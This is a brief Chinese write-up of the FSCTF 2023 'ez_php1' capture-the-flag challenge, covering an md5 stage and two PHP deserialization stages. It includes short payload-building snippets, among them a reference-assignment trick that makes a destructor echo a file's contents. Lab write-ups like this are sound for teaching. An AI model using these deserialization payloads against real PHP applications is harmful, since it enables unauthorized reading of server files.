[FSCTF 2023]ez_php1

爆农2024-05-14 13:33

一共有三小关

第一关:md5加密

第二关:反序列化

重点 单个字符串序列化 unserialize($str) === "$KEY"

php 复制代码 
<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。

php 复制代码 
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
相关推荐
黑客老李1 天前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
qq_353737541 天前
网站评分系统API
php
huaweichenai1 天前
中国工商银行支付对接
php
搂着猫睡的小鱼鱼1 天前
Ozon 商品页数据解析与提取 API
爬虫·php
岁杪杪1 天前
关于运维:LINUX 零基础
运维·服务器·php
青茶3601 天前
php怎么实现订单接口状态轮询(二)
前端·php·接口
一分半心动1 天前
宝塔面板lnmp架构,tp6框架网站伪静态
nginx·php
枷锁—sha1 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
Hao.Zhou1 天前
phpstudy 进行 composer 全局配置
php·composer
zorro_z1 天前
ThinkPHP8学习篇(十六):错误调试与辅助组件
php
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04OpenClaw Chrome扩展使用教程 - 浏览器中继控制05Linux下V2Ray安装配置指南06UV安装并设置国内源07Claude Code Skills 实用使用手册08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示10Vue-skills的中文文档